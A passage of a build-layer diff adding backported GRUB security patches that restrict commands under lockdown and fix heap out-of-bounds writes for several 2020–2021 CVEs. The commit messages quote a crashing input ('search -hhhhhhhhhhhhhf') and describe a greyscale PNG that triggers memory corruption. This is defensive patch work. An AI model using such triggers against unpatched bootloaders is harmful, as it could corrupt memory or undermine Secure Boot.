526+ * Ensure that the buffer size is at least the requested
527+ * number of bytes.
528+ */
529+extern grub_err_t grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req);
530+
531+/*
532+ * Append the specified number of bytes from the supplied
533+ * data to the buffer.
534+ */
535+static inline grub_err_t
536+grub_buffer_append_data (grub_buffer_t buf, const void *data, grub_size_t len)
537+{
538+ grub_size_t req;
539+
540+ if (grub_add (buf->used, len, &req))
541+ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
542+
543+ if (grub_buffer_ensure_space (buf, req) != GRUB_ERR_NONE)
544+ return grub_errno;
545+
546+ grub_memcpy (&buf->data[buf->used], data, len);
547+ buf->used = req;
548+
549+ return GRUB_ERR_NONE;
550+}
551+
552+/* Append the supplied character to the buffer. */
553+static inline grub_err_t
554+grub_buffer_append_char (grub_buffer_t buf, char c)
555+{
556+ return grub_buffer_append_data (buf, &c, 1);
557+}
558+
559+/*
560+ * Forget and return the underlying data buffer. The caller
561+ * becomes the owner of this buffer, and must free it when it
562+ * is no longer required.
563+ */
564+extern void *grub_buffer_take_data (grub_buffer_t buf);
565+
566+/* Reset this buffer. Note that this does not deallocate any resources. */
567+void grub_buffer_reset (grub_buffer_t buf);
568+
569+/*
570+ * Return a pointer to the underlying data buffer at the specified
571+ * offset from the current read position. Note that this pointer may
572+ * become invalid if the buffer is mutated further.
573+ */
574+static inline void *
575+grub_buffer_peek_data_at (grub_buffer_t buf, grub_size_t off)
576+{
577+ if (grub_add (buf->pos, off, &off))
578+ {
579+ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected."));
580+ return NULL;
581+ }
582+
583+ if (off >= buf->used)
584+ {
585+ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("peek out of range"));
586+ return NULL;
587+ }
588+
589+ return &buf->data[off];
590+}
591+
592+/*
593+ * Return a pointer to the underlying data buffer at the current
594+ * read position. Note that this pointer may become invalid if the
595+ * buffer is mutated further.
596+ */
597+static inline void *
598+grub_buffer_peek_data (grub_buffer_t buf)
599+{
600+ return grub_buffer_peek_data_at (buf, 0);
601+}
602+
603+/* Advance the read position by the specified number of bytes. */
604+extern grub_err_t grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n);
605+
606+#endif /* GRUB_BUFFER_H */
607--
6082.25.1
609
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
new file mode 100644
index 0000000000..c82423b8af
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
@@ -0,0 +1,70 @@
1From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Wed, 14 Oct 2020 16:33:42 +0200
4Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown
5 is enforced
6
7The cutmem and badram commands can be used to remove EFI memory regions
8and potentially disable the UEFI Secure Boot. Prevent the commands to be
9registered if the GRUB is locked down.
10
11Fixes: CVE-2020-27779
12
13Reported-by: Teddy Reed <teddy.reed@gmail.com>
14Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
15Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
16
17Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9]
18CVE: CVE-2020-27779
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 docs/grub.texi | 4 ++++
22 grub-core/mmap/mmap.c | 13 +++++++------
23 2 files changed, 11 insertions(+), 6 deletions(-)
24
25diff --git a/docs/grub.texi b/docs/grub.texi
26index 47ac7ff..a1aaee6 100644
27--- a/docs/grub.texi
28+++ b/docs/grub.texi
29@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns
30 that are often result of memory damage, due to physical distribution of memory
31 cells.
32
33+Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
34+ This prevents removing EFI memory regions to potentially subvert the
35+ security mechanisms provided by the UEFI secure boot.
36+
37 @node blocklist
38 @subsection blocklist
39
40diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
41index 57b4e9a..7ebf32e 100644
42--- a/grub-core/mmap/mmap.c
43+++ b/grub-core/mmap/mmap.c
44@@ -20,6 +20,7 @@
45 #include <grub/memory.h>
46 #include <grub/machine/memory.h>
47 #include <grub/err.h>
48+#include <grub/lockdown.h>
49 #include <grub/misc.h>
50 #include <grub/mm.h>
51 #include <grub/command.h>
52@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut;
53
54 GRUB_MOD_INIT(mmap)
55 {
56- cmd = grub_register_command ("badram", grub_cmd_badram,
57- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
58- N_("Declare memory regions as faulty (badram)."));
59- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem,
60- N_("FROM[K|M|G] TO[K|M|G]"),
61- N_("Remove any memory regions in specified range."));
62+ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram,
63+ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
64+ N_("Declare memory regions as faulty (badram)."));
65+ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem,
66+ N_("FROM[K|M|G] TO[K|M|G]"),
67+ N_("Remove any memory regions in specified range."));
68
69 }
70
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
new file mode 100644
index 0000000000..e33c96a05b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
@@ -0,0 +1,105 @@
1From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Wed, 24 Feb 2021 09:00:05 +0100
4Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs
5 when locked down
6
7There are some more commands that should be restricted when the GRUB is
8locked down. Following is the list of commands and reasons to restrict:
9
10 * fakebios: creates BIOS-like structures for backward compatibility with
11 existing OSes. This should not be allowed when locked down.
12
13 * loadbios: reads a BIOS dump from storage and loads it. This action
14 should not be allowed when locked down.
15
16 * devicetree: loads a Device Tree blob and passes it to the OS. It replaces
17 any Device Tree provided by the firmware. This also should
18 not be allowed when locked down.
19
20Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
21Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
22
23Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e]
24CVE: CVE-2020-27779
25Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
26---
27 docs/grub.texi | 3 +++
28 grub-core/commands/efi/loadbios.c | 16 ++++++++--------
29 grub-core/loader/arm/linux.c | 6 +++---
30 grub-core/loader/efi/fdt.c | 4 ++--
31 4 files changed, 16 insertions(+), 13 deletions(-)
32
33diff --git a/docs/grub.texi b/docs/grub.texi
34index a1aaee6..ccf1908 100644
35--- a/docs/grub.texi
36+++ b/docs/grub.texi
37@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux
38 kernel. Does not perform merging with any device tree supplied by firmware,
39 but rather replaces it completely.
40 @ref{GNU/Linux}.
41+
42+Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
43+ This is done to prevent subverting various security mechanisms.
44 @end deffn
45
46 @node distrust
47diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c
48index d41d521..5c7725f 100644
49--- a/grub-core/commands/efi/loadbios.c
50+++ b/grub-core/commands/efi/loadbios.c
51@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios;
52
53 GRUB_MOD_INIT(loadbios)
54 {
55- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios,
56- 0, N_("Create BIOS-like structures for"
57- " backward compatibility with"
58- " existing OS."));
59-
60- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios,
61- N_("BIOS_DUMP [INT10_DUMP]"),
62- N_("Load BIOS dump."));
63+ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios,
64+ 0, N_("Create BIOS-like structures for"
65+ " backward compatibility with"
66+ " existing OS."));
67+
68+ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios,
69+ N_("BIOS_DUMP [INT10_DUMP]"),
70+ N_("Load BIOS dump."));
71 }
72
73 GRUB_MOD_FINI(loadbios)
74diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c
75index d70c174..ed23dc7 100644
76--- a/grub-core/loader/arm/linux.c
77+++ b/grub-core/loader/arm/linux.c
78@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux)
79 0, N_("Load Linux."));
80 cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd,
81 0, N_("Load initrd."));
82- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree,
83- /* TRANSLATORS: DTB stands for device tree blob. */
84- 0, N_("Load DTB file."));
85+ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree,
86+ /* TRANSLATORS: DTB stands for device tree blob. */
87+ 0, N_("Load DTB file."));
88 my_mod = mod;
89 current_fdt = (const void *) grub_arm_firmware_get_boot_data ();
90 machine_type = grub_arm_firmware_get_machine_type ();
91diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c
92index ee9c559..003d07c 100644
93--- a/grub-core/loader/efi/fdt.c
94+++ b/grub-core/loader/efi/fdt.c
95@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree;
96 GRUB_MOD_INIT (fdt)
97 {
98 cmd_devicetree =
99- grub_register_command ("devicetree", grub_cmd_devicetree, 0,
100- N_("Load DTB file."));
101+ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0,
102+ N_("Load DTB file."));
103 }
104
105 GRUB_MOD_FINI (fdt)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
new file mode 100644
index 0000000000..f9a6a73ebc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
@@ -0,0 +1,37 @@
1From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Wed, 24 Feb 2021 22:59:59 +0100
4Subject: [PATCH] commands/setpci: Restrict setpci command when locked down
5
6This command can set PCI devices register values, which makes it dangerous
7in a locked down configuration. Restrict it so can't be used on this setup.
8
9Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
10Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
11
12Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02]
13CVE: CVE-2020-27779
14Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
15---
16 grub-core/commands/setpci.c | 8 ++++----
17 1 file changed, 4 insertions(+), 4 deletions(-)
18
19diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c
20index d5bc97d..fa2ba7d 100644
21--- a/grub-core/commands/setpci.c
22+++ b/grub-core/commands/setpci.c
23@@ -329,10 +329,10 @@ static grub_extcmd_t cmd;
24
25 GRUB_MOD_INIT(setpci)
26 {
27- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0,
28- N_("[-s POSITION] [-d DEVICE] [-v VAR] "
29- "REGISTER[=VALUE[:MASK]]"),
30- N_("Manipulate PCI devices."), options);
31+ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0,
32+ N_("[-s POSITION] [-d DEVICE] [-v VAR] "
33+ "REGISTER[=VALUE[:MASK]]"),
34+ N_("Manipulate PCI devices."), options);
35 }
36
37 GRUB_MOD_FINI(setpci)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
new file mode 100644
index 0000000000..a756f8d1cf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
@@ -0,0 +1,35 @@
1From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Wed, 24 Feb 2021 12:59:29 +0100
4Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down
5
6The command can be used to get/set ATA disk parameters. Some of these can
7be dangerous since change the disk behavior. Restrict it when locked down.
8
9Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
10Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
11
12Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0]
13CVE: CVE-2020-27779
14Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
15---
16 grub-core/commands/hdparm.c | 6 +++---
17 1 file changed, 3 insertions(+), 3 deletions(-)
18
19diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c
20index d3fa966..2e2319e 100644
21--- a/grub-core/commands/hdparm.c
22+++ b/grub-core/commands/hdparm.c
23@@ -436,9 +436,9 @@ static grub_extcmd_t cmd;
24
25 GRUB_MOD_INIT(hdparm)
26 {
27- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0,
28- N_("[OPTIONS] DISK"),
29- N_("Get/set ATA disk parameters."), options);
30+ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0,
31+ N_("[OPTIONS] DISK"),
32+ N_("Get/set ATA disk parameters."), options);
33 }
34
35 GRUB_MOD_FINI(hdparm)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
new file mode 100644
index 0000000000..b52273ff50
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
@@ -0,0 +1,62 @@
1From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Wed, 24 Feb 2021 15:03:26 +0100
4Subject: [PATCH] gdb: Restrict GDB access when locked down
5
6The gdbstub* commands allow to start and control a GDB stub running on
7local host that can be used to connect from a remote debugger. Restrict
8this functionality when the GRUB is locked down.
9
10Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
11Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
12
13Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d]
14CVE: CVE-2020-27779
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/gdb/gdb.c | 32 ++++++++++++++++++--------------
18 1 file changed, 18 insertions(+), 14 deletions(-)
19
20diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c
21index 847a1e1..1818cb6 100644
22--- a/grub-core/gdb/gdb.c
23+++ b/grub-core/gdb/gdb.c
24@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break;
25 GRUB_MOD_INIT (gdb)
26 {
27 grub_gdb_idtinit ();
28- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub,
29- N_("PORT"),
30- /* TRANSLATORS: GDB stub is a small part of
31- GDB functionality running on local host
32- which allows remote debugger to
33- connect to it. */
34- N_("Start GDB stub on given port"));
35- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break,
36- /* TRANSLATORS: this refers to triggering
37- a breakpoint so that the user will land
38- into GDB. */
39- 0, N_("Break into GDB"));
40- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop,
41- 0, N_("Stop GDB stub"));
42+ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub,
43+ N_("PORT"),
44+ /*
45+ * TRANSLATORS: GDB stub is a small part of
46+ * GDB functionality running on local host
47+ * which allows remote debugger to
48+ * connect to it.
49+ */
50+ N_("Start GDB stub on given port"));
51+ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break,
52+ /*
53+ * TRANSLATORS: this refers to triggering
54+ * a breakpoint so that the user will land
55+ * into GDB.
56+ */
57+ 0, N_("Break into GDB"));
58+ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop,
59+ 0, N_("Stop GDB stub"));
60 }
61
62 GRUB_MOD_FINI (gdb)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
new file mode 100644
index 0000000000..474826ade5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
@@ -0,0 +1,61 @@
1From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Wed, 24 Feb 2021 14:44:38 +0100
4Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when
5 locked down
6
7The shim_lock verifier validates the XNU kernels but no its extensions
8and packages. Prevent these to be loaded when the GRUB is locked down.
9
10Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
11Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
12
13Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5]
14CVE: CVE-2020-27779
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/loader/xnu.c | 31 +++++++++++++++++--------------
18 1 file changed, 17 insertions(+), 14 deletions(-)
19
20diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
21index 77d7060..07232d2 100644
22--- a/grub-core/loader/xnu.c
23+++ b/grub-core/loader/xnu.c
24@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu)
25 N_("Load XNU image."));
26 cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64,
27 0, N_("Load 64-bit XNU image."));
28- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0,
29- N_("Load XNU extension package."));
30- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0,
31- N_("Load XNU extension."));
32- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir,
33- /* TRANSLATORS: OSBundleRequired is a
34- variable name in xnu extensions
35- manifests. It behaves mostly like
36- GNU/Linux runlevels.
37- */
38- N_("DIRECTORY [OSBundleRequired]"),
39- /* TRANSLATORS: There are many extensions
40- in extension directory. */
41- N_("Load XNU extension directory."));
42+ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0,
43+ N_("Load XNU extension package."));
44+ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0,
45+ N_("Load XNU extension."));
46+ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir,
47+ /*
48+ * TRANSLATORS: OSBundleRequired is
49+ * a variable name in xnu extensions
50+ * manifests. It behaves mostly like
51+ * GNU/Linux runlevels.
52+ */
53+ N_("DIRECTORY [OSBundleRequired]"),
54+ /*
55+ * TRANSLATORS: There are many extensions
56+ * in extension directory.
57+ */
58+ N_("Load XNU extension directory."));
59 cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0,
60 /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */
61 N_("Load XNU ramdisk. "
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
new file mode 100644
index 0000000000..e5d372a2b1
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
@@ -0,0 +1,65 @@
1From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Sat, 7 Nov 2020 01:03:18 +0100
4Subject: [PATCH] docs: Document the cutmem command
5
6The command is not present in the docs/grub.texi user documentation.
7
8Reported-by: Daniel Kiper <daniel.kiper@oracle.com>
9Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
10Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
11Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
12
13Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122]
14CVE: CVE-2020-27779
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 docs/grub.texi | 21 +++++++++++++++++++++
18 1 file changed, 21 insertions(+)
19
20diff --git a/docs/grub.texi b/docs/grub.texi
21index ccf1908..ae85f55 100644
22--- a/docs/grub.texi
23+++ b/docs/grub.texi
24@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help}
25 * cpuid:: Check for CPU features
26 * crc:: Compute or check CRC32 checksums
27 * cryptomount:: Mount a crypto device
28+* cutmem:: Remove memory regions
29 * date:: Display or set current date and time
30 * devicetree:: Load a device tree blob
31 * distrust:: Remove a pubkey from trusted keys
32@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns
33 that are often result of memory damage, due to physical distribution of memory
34 cells.
35
36+The command is similar to @command{cutmem} command.
37+
38 Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
39 This prevents removing EFI memory regions to potentially subvert the
40 security mechanisms provided by the UEFI secure boot.
41@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules
42 be used.
43 @end deffn
44
45+@node cutmem
46+@subsection cutmem
47+
48+@deffn Command cutmem from[K|M|G] to[K|M|G]
49+Remove any memory regions in specified range.
50+@end deffn
51+
52+This command notifies the memory manager that specified regions of RAM ought to
53+be filtered out. This remains in effect after a payload kernel has been loaded
54+by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels
55+that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot
56+kernels in general.
57+
58+The command is similar to @command{badram} command.
59+
60+Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
61+ This prevents removing EFI memory regions to potentially subvert the
62+ security mechanisms provided by the UEFI secure boot.
63
64 @node date
65 @subsection date
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20225.patch b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
new file mode 100644
index 0000000000..b864febe62
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
@@ -0,0 +1,58 @@
1From 2a330dba93ff11bc00eda76e9419bc52b0c7ead6 Mon Sep 17 00:00:00 2001
2From: Daniel Axtens <dja@axtens.net>
3Date: Fri, 22 Jan 2021 16:07:29 +1100
4Subject: lib/arg: Block repeated short options that require an argument
5
6Fuzzing found the following crash:
7
8 search -hhhhhhhhhhhhhf
9
10We didn't allocate enough option space for 13 hints because the
11allocation code counts the number of discrete arguments (i.e. argc).
12However, the shortopt parsing code will happily keep processing
13a combination of short options without checking if those short
14options require an argument. This means you can easily end writing
15past the allocated option space.
16
17This fixes a OOB write which can cause heap corruption.
18
19Fixes: CVE-2021-20225
20
21Reported-by: Daniel Axtens <dja@axtens.net>
22Signed-off-by: Daniel Axtens <dja@axtens.net>
23Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
24
25Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2a330dba93ff11bc00eda76e9419bc52b0c7ead6]
26CVE: CVE-2021-20225
27Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
28---
29 grub-core/lib/arg.c | 13 +++++++++++++
30 1 file changed, 13 insertions(+)
31
32diff --git a/grub-core/lib/arg.c b/grub-core/lib/arg.c
33index 3288609..537c5e9 100644
34--- a/grub-core/lib/arg.c
35+++ b/grub-core/lib/arg.c
36@@ -299,6 +299,19 @@ grub_arg_parse (grub_extcmd_t cmd, int argc, char **argv,
37 it can have an argument value. */
38 if (*curshort)
39 {
40+ /*
41+ * Only permit further short opts if this one doesn't
42+ * require a value.
43+ */
44+ if (opt->type != ARG_TYPE_NONE &&
45+ !(opt->flags & GRUB_ARG_OPTION_OPTIONAL))
46+ {
47+ grub_error (GRUB_ERR_BAD_ARGUMENT,
48+ N_("missing mandatory option for `%s'"),
49+ opt->longarg);
50+ goto fail;
51+ }
52+
53 if (parse_option (cmd, opt, 0, usr) || grub_errno)
54 goto fail;
55 }
56--
572.25.1
58
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20233.patch b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
new file mode 100644
index 0000000000..d2069afc18
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
@@ -0,0 +1,50 @@
1From 2f533a89a8dfcacbf2c9dbc77d910f111f24bf33 Mon Sep 17 00:00:00 2001
2From: Daniel Axtens <dja@axtens.net>
3Date: Fri, 22 Jan 2021 17:10:48 +1100
4Subject: commands/menuentry: Fix quoting in setparams_prefix()
5
6Commit 9acdcbf32542 (use single quotes in menuentry setparams command)
7says that expressing a quoted single quote will require 3 characters. It
8actually requires (and always did require!) 4 characters:
9
10 str: a'b => a'\''b
11 len: 3 => 6 (2 for the letters + 4 for the quote)
12
13This leads to not allocating enough memory and thus out of bounds writes
14that have been observed to cause heap corruption.
15
16Allocate 4 bytes for each single quote.
17
18Commit 22e7dbb2bb81 (Fix quoting in legacy parser.) does the same
19quoting, but it adds 3 as extra overhead on top of the single byte that
20the quote already needs. So it's correct.
21
22Fixes: 9acdcbf32542 (use single quotes in menuentry setparams command)
23Fixes: CVE-2021-20233
24
25Reported-by: Daniel Axtens <dja@axtens.net>
26Signed-off-by: Daniel Axtens <dja@axtens.net>
27
28Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2f533a89a8dfcacbf2c9dbc77d910f111f24bf33]
29CVE: CVE-2021-20233
30Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
31---
32 grub-core/commands/menuentry.c | 2 +-
33 1 file changed, 1 insertion(+), 1 deletion(-)
34
35diff --git a/grub-core/commands/menuentry.c b/grub-core/commands/menuentry.c
36index 9164df7..720e6d8 100644
37--- a/grub-core/commands/menuentry.c
38+++ b/grub-core/commands/menuentry.c
39@@ -230,7 +230,7 @@ setparams_prefix (int argc, char **args)
40 len += 3; /* 3 = 1 space + 2 quotes */
41 p = args[i];
42 while (*p)
43- len += (*p++ == '\'' ? 3 : 1);
44+ len += (*p++ == '\'' ? 4 : 1);
45 }
46
47 result = grub_malloc (len + 2);
48--
492.25.1
50
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3695.patch b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
new file mode 100644
index 0000000000..7d6e805725
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
@@ -0,0 +1,178 @@
1From 0693d672abcf720419f86c56bda6428c540e2bb1 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 20 Jul 2022 10:01:35 +0530
4Subject: [PATCH] CVE-2021-3695
5
6Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=e623866d9286410156e8b9d2c82d6253a1b22d08]
7CVE: CVE-2021-3695
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10 video/readers/png: Drop greyscale support to fix heap out-of-bounds write
11
12A 16-bit greyscale PNG without alpha is processed in the following loop:
13
14 for (i = 0; i < (data->image_width * data->image_height);
15 i++, d1 += 4, d2 += 2)
16{
17 d1[R3] = d2[1];
18 d1[G3] = d2[1];
19 d1[B3] = d2[1];
20}
21
22The increment of d1 is wrong. d1 is incremented by 4 bytes per iteration,
23but there are only 3 bytes allocated for storage. This means that image
24data will overwrite somewhat-attacker-controlled parts of memory - 3 bytes
25out of every 4 following the end of the image.
26
27This has existed since greyscale support was added in 2013 in commit
283ccf16dff98f (grub-core/video/readers/png.c: Support grayscale).
29
30Saving starfield.png as a 16-bit greyscale image without alpha in the gimp
31and attempting to load it causes grub-emu to crash - I don't think this code
32has ever worked.
33
34Delete all PNG greyscale support.
35
36Fixes: CVE-2021-3695
37
38Signed-off-by: Daniel Axtens <dja@axtens.net>
39Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
40---
41 grub-core/video/readers/png.c | 89 ++++-------------------------------
42 1 file changed, 8 insertions(+), 81 deletions(-)
43
44diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
45index 0157ff7..db4a9d4 100644
46--- a/grub-core/video/readers/png.c
47+++ b/grub-core/video/readers/png.c
48@@ -100,7 +100,7 @@ struct grub_png_data
49
50 unsigned image_width, image_height;
51 int bpp, is_16bit;
52- int raw_bytes, is_gray, is_alpha, is_palette;
53+ int raw_bytes, is_alpha, is_palette;
54 int row_bytes, color_bits;
55 grub_uint8_t *image_data;
56
57@@ -280,13 +280,13 @@ grub_png_decode_image_header (struct grub_png_data *data)
58 data->bpp = 3;
59 else
60 {
61- data->is_gray = 1;
62- data->bpp = 1;
63+ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
64+ "png: color type not supported");
65 }
66
67 if ((color_bits != 8) && (color_bits != 16)
68 && (color_bits != 4
